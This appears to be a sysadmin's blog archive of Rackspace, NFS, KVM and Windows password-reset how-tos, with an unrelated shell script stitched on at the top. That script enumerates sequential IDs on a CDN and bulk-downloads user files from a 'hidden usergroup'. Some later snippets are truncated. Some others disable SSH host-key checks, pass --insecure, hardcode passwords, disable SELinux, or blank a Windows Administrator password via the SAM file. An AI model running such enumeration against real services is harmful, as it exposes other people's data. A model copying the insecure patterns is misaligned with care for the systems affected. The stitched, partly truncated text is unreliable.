#!/bin/sh
# just use uuid's instead of sequential numbers hehe
for a in `seq 10000000 90000000`;
do
for b in `seq 1 10`;
do
#echo http://cdn.anonymous.com/$a""_""$b"".user"
echo "wget http://cdn.anonymous.com/$a""_""$b"".user" | bash
#echo "curl http://cdn.anonymous.com/$a""_""$b".user -o "($a)"_"($b)".user"
filesize=`ls -al "$a"_"$b".user | awk '{print $5}'`
echo "FILESIZE= $filesize"
if [ "$filesize" -eq "49" ]
then
echo "404: Emtpy fakefile HTTP 200 detected! The end of this hidden usergroup was detected"
echo "Cleaning up.."
rm "$a"_"$b".user
break;
else
echo "200: Continuing "
fi
sleep 4
done
Author Archives: azio
Obscene Redundancy utilizing Rackspace Cloud Files
So, you may have noticed over the past weeks and months I have been a little bit quieter about the articles I have been writing. Mainly because I’ve been working on a new github project, which, although simple, and lightweight is actually really rather outrageously powerful.
https://github.com/aziouk/obsceneredundancy
Imagine being able to take 15+ redundant replica copies of your files, across 5 or 6 different datacentres. Rackspace Cloud Files API powered, but also with a lot of the flexibility of Bourne Again Shell (BASH).
This was actually quite a neat achievement and I am pleased with the results. There are still some limitations of this redundant replica application, and there are a few bugs, but it is a great proof of concept which shows what you can do with the API both quickly and cheaply (ish). Using filesystems as a service will be the future with some further innovation on the world wide network infrastructure, and it would only take a small breakthrough to rapidly alter the way that OS and machines boot/backup.
If you want to see the project and read the source code before I lay out and describe/explain the entire process of writing this software as well as how to deploy it with cron on linux, then you need wait no longer. Revision 1 alpha is now tested, ready and working in 5 different datacentres.
You can actually toggle which datacentres you wish to utilize as well, it is slightly flexible. The only important consideration here is to understand that there are some limitations such as a lack of de-duping, and this uses tar’s and swiftly, instead of directly querying the API. Since directly uploading thru the API a tar file is relatively simple, I will probably implement it like that as I have before and get rid of swiftly in future iterations, however such a project is really ideal for learning more about BASH , CRON, API and programmatic automation of and sequential filesystems utilizing functional programming and division of labour between workers,
https://github.com/aziouk/obsceneredundancy
Test it (please note it will be a little bit buggy on different environments and there is no instructions yet)
git clone https://github.com/aziouk/obsceneredundancy
Cheers &
Best wishes,
Adam
Downloading / Backing up all Rackspace Cloud Files
Here’s a quick and dirty way to download your entire Rackspace Cloud Files container. This comes up a lot at work.
INSTALLING SWIFTLY
# Debian / Ubuntu systems apt-get install python-pip
# CentOS and Redhat Systems yum install python-pip pip install swiftly
Once you have installed swiftly, you will want to configure your swiftly client. This is also relatively easy.
CONFIGURING SWIFTLY
# create a file in your ‘home’ environment. Using ~ is the root users directory
# if logged in as root on a unix server
touch ~/.swiftly.conf
You will want to edit the file above
pico ~/.swiftly.conf
The file needs to look exactly like the text below:
[swiftly] auth_user = yourmycloudusername auth_key = yourapikey auth_url = https://identity.api.rackspacecloud.com/v2.0 region = LON
To save in pico you type CTRL + O
You have now installed swiftly, and configured swiftly. You should then be able to simply run the command:
Running swiftly to download all containers/files on Rackspace Cloud Files
swiftly get --all-objects --output=mycloudfiles/
This comes up a lot, I am sure that some people out there will appreciate this!
Configuring Basic NFS Server+Client on RHEL7
So, you want to configure NFS? This isn’t too difficult to do. First of all you will need to, in the simplest setup, create 2 servers, one acting as the NFS server which hosts the content and attached disks. The second server, acting as the client, which mounts the filesystem of the NFS server over the network to a local mount point on the client. In RHEL 7 this is remarkably easy to do.
Install and Configure NFS on the Server
Install dependencies
yum -y install nfs-utils rpcbind
Create a directory on the server
This is the directory we will share
mkdir -p /opt/nfs
Configure access for the client server on ip 10.0.0.2
vi /etc/exports # alternatively you can directly pipe the configuration but I don't recommend it echo "/opt/nfs 10.0.0.2(no_root_squash,rw,sync)" > /etc/exports
Open Firewall ports used by NFS
firewall-cmd --zone=public --add-port=2049/tcp --permanent firewall-cmd --reload
Restart NFS services & check NFS status
service rpcbind start; service nfs start service nfs status
Install and configure NFS on the Client
Install dependencies & start rpcbind
yum install nfs-utils rpcbind service rpcbind start
Create directory to mount NFS
# Directory we will mount our Network filesystem on the client mkdir -p /mnt/nfs # The server ip address is 10.0.0.1, with the path /opt/nfs, we want to mount it to the client on /mnt/nfs this could be anything like # /mnt/randomdata-1234 etc as long as the folder exists; mount 10.0.0.1:/opt/nfs /mnt/nfs/
Check that the NFS works
echo "meh testing.." > /mnt/nfs/testing.txt cat /mnt/nfs/testing.txt ls -al /mnt/nfs
You should see the filesystem now has testing.txt on it. Confirming you setup NFS correctly.
Make NFS mount permanent by enabling the service permanently, and adding the mount to fstab
This will cause the server to automount the fs during boot time
systemctl enable nfs-server
vi /etc/fstab 10.0.0.1:/opt/nfs /mnt/nfs nfs defaults 0 0 # OR you could simply pipe the configuration to the file (this is really dangerous though) # Unless you are absolutely sure what you are doing echo "10.0.0.1:/opt/nfs /mnt/nfs nfs defaults 0 0" >> /etc/fstab
If you reboot the client now, you should see that the NFS mount comes back.
Using Rackspace Cloud Files, swiftly and cron to Backup Data to multiple data-centres cheaply
So, you have some really important data, so much so that 99.99% redundancy is not enough for you. One solution to this is to use multiple copies in multiple datacentres. Most enterprise backup will have on-site, an off-site, and an archival copy. What I’m going to show here is how to make 4 different copies of your data, in 4 different datacentres around the world. This will provide a very high redundancy of storage, and greatly reduce the likelihood of data loss. Although it costs a bit more, this kind of solution may be suitable for many small, medium and large businesses. Naturally, depending on the size of the data, and the importance of redundancy. You might not have many files to backup, perhaps a small cd worth.. it will be very inexpensive if you have a small backup to make. However, due to the way that cloud files is billed, copying data to cloud files costs money in bandwidth when writing from a server in London to a cloud files in Sydney, Chicago or Dallas for instance, so it’s very important to consider the impact of bandwidth costs when utilizing an additional 3 cloud files endpoints that are not in the local datacentre region. Which, is essentially what we are doing in this guide.
Setup swiftly
yum install python-devel python-pip -y pip install swiftly eventlet
Create your swiftly environments (setting the name for each file)
==> /root/.swiftly-dfw.conf <== [swiftly] auth_user = myusername auth_key = censored auth_url = https://identity.api.rackspacecloud.com/v2.0 region = dfw ==> /root/.swiftly-iad.conf <== [swiftly] auth_user = myusername auth_key = censored auth_url = https://identity.api.rackspacecloud.com/v2.0 region = iad ==> /root/.swiftly-ord.conf <== [swiftly] auth_user = myusername auth_key = censored auth_url = https://identity.api.rackspacecloud.com/v2.0 region = ord ==> /root/.swiftly-syd.conf <== [swiftly] auth_user = myusername auth_key = censored auth_url = https://identity.api.rackspacecloud.com/v2.0 region = syd
Create your Script
# Adam Bull # Adam Bull, Rackspace UK # May 17, 2016 # This can be sequential or, it can be parallel, not sure which is better yet use & for parallel # This backs up /documents file and puts it in the 'managed_backup' cloud files container at the following 4 datacentres ,DFW, IAD, ORD and SYD swiftly --verbose --conf ~/.swiftly-dfw.conf --concurrency 100 put -i /documents /managed_backup swiftly --verbose --no-snet --conf ~/.swiftly-iad.conf --concurrency 100 put -i /documents /managed_backup swiftly --verbose --no-snet --conf ~/.swiftly-ord.conf --concurrency 100 put -i /documents /managed_backup swiftly --verbose --no-snet --conf ~/.swiftly-syd.conf --concurrency 100 put -i /documents /managed_backup
Because the other 3 endpoints are in different datacentres, we can't use servicenet, so we defined --no-snet option for swiftly as above.
Execute your script
chmod +x multibackup.sh ./multibackup.sh
This obviously is a basic system and script of taking backups, and it is not for production use (yet). This is an alpha project I started today. The cool thing is that it works, and quite nicely. Although it is far from finished yet as a workable script.
Once the script is made, you can simply add it to crontab -e as you would usually. Make sure the user you execute with cron has access to the .conf files in their home directory!
Checking Load Balancer Connectivity & Automating it in some interesting ways
So, in a dream last night, I woke up realising I had forgot to write my automated load balancer connectivity checker.
Basically, sometimes a customer will complain their site is down because their ‘load balancer is broken’! In many cases, this is actually due to a firewall on one of the nodes behind the load balancer, or an issue with the webserver application listening on the port. So, I wrote a little piece of automation in the form of a BASH script, that accepts an Load Balancer ID and then uses the API to pull the server nodes behind that Load Balancer, including the ports being used to communicate, and then uses, either netcat or nmap to check that port for connectivity. There were a few ways to achieve this, but the below is what I was happiest with.
#!/bin/bash
# Username used to login to control panel
USERNAME='mycloudusernamegoeshere'
# Find the APIKey in the 'account settings' part of the menu of the control panel
APIKEY="apikeygoeshere"
# Your Rackspace account number (the number that is in the URL of the control panel after logging in)
ACCOUNT=100101010
# Your Rackspace loadbalancerID
LOADBALANCERID=157089
# Rackspace LoadBalancer Endpoint
ENDPOINT="https://lon.loadbalancers.api.rackspacecloud.com/v1.0"
# This section simply retrieves and sets the TOKEN
TOKEN=`curl https://identity.api.rackspacecloud.com/v2.0/tokens -X POST -d '{ "auth":{"RAX-KSKEY:apiKeyCredentials": { "username":"'$USERNAME'", "apiKey": "'$APIKEY'" }} }' -H "Content-type: application/json" | python -mjson.tool | grep -A5 token | grep id | cut -d '"' -f4`
# (UNUSED) METHOD 1Extract IP addresses (Currently assuming port 80 only)
#curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].address | xargs -i nmap -p 80 {}
# (UNUSED) Extract ports
# curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].port | xargs -i nmap -p 80 {}
# I opted for using this method to extract the important detail
curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].address | sed 's/"//g' > address.txt
curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].port > port.txt
# Loop thru both output files sequentially, order is important
# WARNING script does not ignore whitespace
while read addressfile1 <&3 && read portfile2 <&4; do
ncat $addressfile1 $portfile2
done 3
Output looks a bit like;
# ./lbtest.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5143 100 5028 100 115 4731 108 0:00:01 0:00:01 --:--:-- 4734
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 225 100 225 0 0 488 0 --:--:-- --:--:-- --:--:-- 488
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 225 100 225 0 0 679 0 --:--:-- --:--:-- --:--:-- 681
Ncat: No route to host.
Ncat: Connection timed out.
I plan to add some additional support that will check the load balancer is up, AND the servicenet connection between the cloud servers.
Please note that this script must be run on a machine with access to servicenet network, in the same Rackspace Datacenter to be able to check servicenet connectivity of servers. The script can give false positives if strict firewall rules are setup on the cloud server nodes behind the load balancer. It's kind of alpha-draft but I thought I would share it as a proof of concept.
You will need to download and install jq to use it. To download jq please see; https://stedolan.github.io/jq/download/
Windows Password reset for Rackspace Cloud Servers
In the previous articles Using API and BASH to validate changing conditions and Reset windows administrator password using rescue mode without nova-agent I explained both the steps how to reset the password of a windows VM instance by modifying the SAM file by using a Linux ‘rescue’ image in the cloud, and, I also explained how to automate checks for BASH automation thru the API. The checks specifically waited until the server entered rescue, and then lifted the ipv4 address, connecting only when the rescue server had finished building.
That way the automation is handling the delay it takes, as well as setting and lifting the access credentials and ip address to use each time. Here is the complete script. Please note that backticks are deprecated but I’m a bit ‘oldskool’. This is a rough alpha, but it works really nicely. After testing it consistently allows ourselves, or our customers to reset a Windows Cloud Server password, in the case that a customer loses access to it, and cannot use other Rackspace services to do the reset. This effectively turns a useless server, back into a usable one again and saves a lot of time.
#!/bin/bash
# Adam Bull, Rackspace UK
# This script automates the resetting of windows passwords
# Arguments $1 == username
# Arguments $2 == apikey
# Arguments $3 == ddi
# Arguments $4 == instanceid
echo "Rackspace windows cloud server Password Reset"
echo "written by Adam Bull, Rackspace UK"
sleep 2
PASSWORD=39fdfgk4d3fdovszc932456j2oZ
# Provide an instance uuid to rescue and reset windows password
USERNAME=mycloudusernamehere
APIKEY=myapikeyhere
# DDI is the 'customer ID', if you don't know this login to the control panel and check the number in the URL
DDI=10010101
# The instance uuid you want to rescue
INSTANCE=ca371a8b-748e-46da-9e6d-8c594691f71c
# INITIATE RESCUE PROCESS
nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure rescue --password "$PASSWORD" --image 7fade26a-0cca-415f-a988-49c021768fca $INSTANCE
# LOOP UNTIL STATE DETECTED AS RESCUED
STATE=0
until [[ $STATE == rescued ]]; do
echo "start rescue check"
STATE=`nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure show $INSTANCE | grep rescued | awk '{print $4}'`
echo "STATE =" $STATE
echo "sleeping.."
sleep 5
done
# EXTRACT PUBLIC ipv4 FROM INSTANCE
IP=`nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure show $INSTANCE | grep public | awk '{print $5}' | grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])'`
echo "IP = $IP"
# UPDATE AND INSTALL RESCUE TOOLS AND RESET WINDOWS PASS
# Set environment locally
yum install sshpass -y
# Execute environment remotely
echo "Performing Rescue..."
sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no root@"$IP" 'yum update -y; yum install ntfs-3g -y; mount /dev/xvdb1 /mnt; curl li.nux.ro/download/nux/dextop/el7/x86_64/nux-dextop-release-0-5.el7.nux.noarch.rpm -o /root/nux.rpm; rpm -Uvh /root/nux.rpm; yum install chntpw -y; cd /mnt/Windows/System32/config; echo -e "1\ny\n" | chntpw -u "Administrator" SAM'
echo "Unrescuing in 100 seconds..."
sleep 100
nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure unrescue $INSTANCE
Thanks again to my friend Cory who gave me the instructions, I simply automated the process to make it easier and learned something in the process 😉
Disabling SELinux
Today we had a customer that needed to perform a first generation server to next generation migration however they cannot have SELinux enabled during this process.
I explain to the customer how to disable this, it’s pretty simple.
vi /etc/sysconfig/selinux
SELINUX=enforcing
Needs to be changed to
SELINUX=disabled
Job done. A simple one but nonetheless important stuff. If you wanted to automate this it would look something like this;
sed -i 's/SELINUX=enforcing/SELINUX=disabled/g'/etc/selinux/config
This sed oneliner simply swaps SELINUX=enforcing to SELINUX=disabled, pretty simple stuffs. It will work on CentOS6 and 7 anyway, and should but I can’t guarantee work on CentOS 5.
Configure Nested KVM for Intel & AMD based Machines
So, we are configuring some openstack and kvm stuff at work for some projects. We’re ‘cloudy’ guys. What can I say? 😀 One Issue I had when installing xenserver, underneath KVM.
(why would we do this?) In our testing environment we’re using a single OnMetal v2 server, and, instead of running xenserver directly on the server, and requiring additional servers, we are using a single 128GB RAM hypervisor for the test environment. One issue though is that Windows is only supported with xenserver when directly run on the ‘host’. Because Xen is running virtualized under KVM we have a problem.
Enter, tested virtualization support. Hardware virtualization assist support will now work for xenserver thru KVM, which means I can boot windows servers. YAY! uh.. 😉 kinda.
Check if Nested hardware virtualization assist is enabled
$cat /sys/module/kvm_intel/parameters/nested N
It wasn’t 🙁 Lets enable it
Enable nested hardware virtualization assist
sudo rmmod kvm-intel sudo sh -c "echo 'options kvm-intel nested=y' >> /etc/modprobe.d/dist.conf" sudo modprobe kvm-intel
Ensure nested hardware virtualization is enabled
cat /sys/module/kvm_intel/parameters/nested Y modinfo kvm_intel | grep nested parm: nested:bool
It worked!
This can also be done for AMD systems simply substituting kvm_amd.
http://docs.openstack.org/developer/devstack/guides/devstack-with-nested-kvm.html
HOWTO: Rackspace Automation, Using BASH with API (to validate conditions to perform conditional tasks)
In the previous article, I showed how to wipe clean the windows password from a broken Virtual Machine that you were locked out of by rescuing with a Linux image. In this article I explain steps of how you would automate this with a bash script, that looked at the STATE of the server, and accepts commandline arguments.
It’s quite a simple script;
#!/bin/bash # Adam Bull # April 28 2016 # This script automates the resetting of windows passwords # Arguments $1 == instanceuuid # Arguments $2 == username # Arguments $3 == apikey PASSWORD=mypassword # Provide an instance uuid to rescue and reset windows password USERNAME=$1 APIKEY=$2 DDI=$3 INSTANCE=$4 nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure rescue --password mypassword --image 7fade26a-0cca-415f-a988-49c021768fca $INSTANCE
The above script takes the arguments I give the executable script on the commandline, in this case the first argument passed is $1, the Rackspace mycloud username. The second argument the apikey. etc. This basically puts the server into rescue. But.. what if we wanted to run some automation AFTER it rescued? We don’t want to try and let the automation ssh to the box and run the automation early, so we could use a supernova show to find whether the VM state has changed to ‘rescue’. Whilst its initiating the state will be rescuing. So we have the option of using when !rescueing logic, or, when == equal to rescue. Lets use when equal to rescue in our validation loop.
This loop will continue until the task state changes to the desired value. Here is how we achieve it
#!/bin/bash
# Initialize Variable
STATE=0
# Validate $STATE variable, looping UNTIL $STATE == rescued
until [[ $STATE == rescued ]]; do
echo "start rescue check"
# 'show' the servers data, and grep for rescued and extract only the correct value if it is found
STATE=`nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure show $INSTANCE | grep rescued | awk '{print $4}'`
# For debugging
echo "STATE =" $STATE
echo "sleeping.."
# For API Limit control
sleep 5
# Exit the loop once until condition satisfied
done
# Post Rescue
echo "If you read this, it means that the program detected a rescued state"
It’s quite a simple script to use. We just provide the arguments $1, $2, $3 and $4.
./rescue.sh mycloudusername mycloudapikey 10010101 e744af0f-6643-44f4-a63f-d99db1588c94
Where 10010101 is the tenant id and e744af0f-6643-44f4-a63f-d99db1588c94 is the UUID of your server.
It’s really quite simple to do! But this is not enough we want to go a step further. Let’s move the rescue.sh to /bin
# WARNING /bin is not a playground this is for demonstration purposes of how to 'install' bin system applications cp rescue.sh /bin/rescue.sh
Now you can call the command ‘rescue’.
rescue mycloudusername mycloudapikey mycustomerid mycloudserveruuidgoeshere
nice, and quite simple too. Obviously ‘post rescue’ in the script I can upload a script via ssh to the server, and then execute it remotely to perform the password reset.